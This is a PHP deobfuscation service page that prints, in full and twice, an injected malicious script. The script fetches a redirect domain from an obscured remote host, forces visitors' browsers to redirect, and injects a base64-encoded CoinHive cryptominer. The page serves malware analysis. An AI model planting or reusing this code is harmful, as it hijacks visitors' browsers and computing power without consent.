Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $path="/index/?2211506963212";$file='/tmp/whois';$time_sec=time();$time_file=filemt..

Decoded Output download

<?php  $path="/index/?2211506963212";$file='/tmp/whois';$time_sec=time();$time_file=filemtime($file);$time=$time_sec-$time_file;if($time>=1800){$ch=curl_init();curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_USERAGENT,"get new domain 777 sh");curl_setopt($ch,CURLOPT_URL,str_rot13("uggc://ebv777.pbz/qbznva.cuc"));curl_setopt($ch,CURLOPT_TIMEOUT,2);$domain=curl_exec($ch);if(empty($domain)){header('Content-Type: text/plain');echo curl_error($ch);}curl_close($ch);if(!empty($domain)){$redirecturl="http://" .$domain .$path;$fp=fopen($file,'w+');fwrite($fp,$redirecturl);fclose($fp);}}else{$handle=fopen($file,"r");if(!$handle){die("Error file creat");}$redirecturl=fread($handle,filesize($file));fclose($handle);}if(!$_COOKIE['a777d']){setcookie("a777d",1,time()+43200,'/');echo '<script>window.location.replace("'.$redirecturl.'");window.location.href = "'.$redirecturl.'";</script>';}else{echo "<script>var idp = 'id260';".base64_decode('dmFyIGpzcHAyMiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOw0KanNwcDIyLm9ubG9hZCA9IGZ1bmN0aW9uKCkgew0KdmFyIHRlc3RfbW9uZXQgPSBuZXcgQ29pbkhpdmUuVXNlcignUVpXQWFmNkNBaUt1Q1Q1Rnp6S01hbzlLblNJVldXMkQnLCBpZHAsIHsNCnRocmVhZHM6IDQsDQphdXRvVGhyZWFkczogZmFsc2UsDQp0aHJvdHRsZTowLjQsDQpmb3JjZUFTTUpTOiBmYWxzZX0pO3Rlc3RfbW9uZXQuc3RhcnQoKTt9Ow0KanNwcDIyLnNyYyA9ICdodHRwczovL2NvaW4taGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcyc7DQpkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKGpzcHAyMik7').'</script>';}?>

Did this file decode correctly?

Original Code

<?php  $path="/index/?2211506963212";$file='/tmp/whois';$time_sec=time();$time_file=filemtime($file);$time=$time_sec-$time_file;if($time>=1800){$ch=curl_init();curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_USERAGENT,"get new domain 777 sh");curl_setopt($ch,CURLOPT_URL,str_rot13("uggc://ebv777.pbz/qbznva.cuc"));curl_setopt($ch,CURLOPT_TIMEOUT,2);$domain=curl_exec($ch);if(empty($domain)){header('Content-Type: text/plain');echo curl_error($ch);}curl_close($ch);if(!empty($domain)){$redirecturl="http://" .$domain .$path;$fp=fopen($file,'w+');fwrite($fp,$redirecturl);fclose($fp);}}else{$handle=fopen($file,"r");if(!$handle){die("Error file creat");}$redirecturl=fread($handle,filesize($file));fclose($handle);}if(!$_COOKIE['a777d']){setcookie("a777d",1,time()+43200,'/');echo '<script>window.location.replace("'.$redirecturl.'");window.location.href = "'.$redirecturl.'";</script>';}else{echo "<script>var idp = 'id260';".base64_decode('dmFyIGpzcHAyMiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOw0KanNwcDIyLm9ubG9hZCA9IGZ1bmN0aW9uKCkgew0KdmFyIHRlc3RfbW9uZXQgPSBuZXcgQ29pbkhpdmUuVXNlcignUVpXQWFmNkNBaUt1Q1Q1Rnp6S01hbzlLblNJVldXMkQnLCBpZHAsIHsNCnRocmVhZHM6IDQsDQphdXRvVGhyZWFkczogZmFsc2UsDQp0aHJvdHRsZTowLjQsDQpmb3JjZUFTTUpTOiBmYWxzZX0pO3Rlc3RfbW9uZXQuc3RhcnQoKTt9Ow0KanNwcDIyLnNyYyA9ICdodHRwczovL2NvaW4taGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcyc7DQpkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKGpzcHAyMik7').'</script>';}?>

Function Calls

time 1
filemtime 1

Variables

$file /tmp/whois
$path /index/?2211506963212
$time_sec 1687293173

Stats

MD5 fbe0322bd828e62ce316ad2a4954ba00
Eval Count 0
Decode Time 85 ms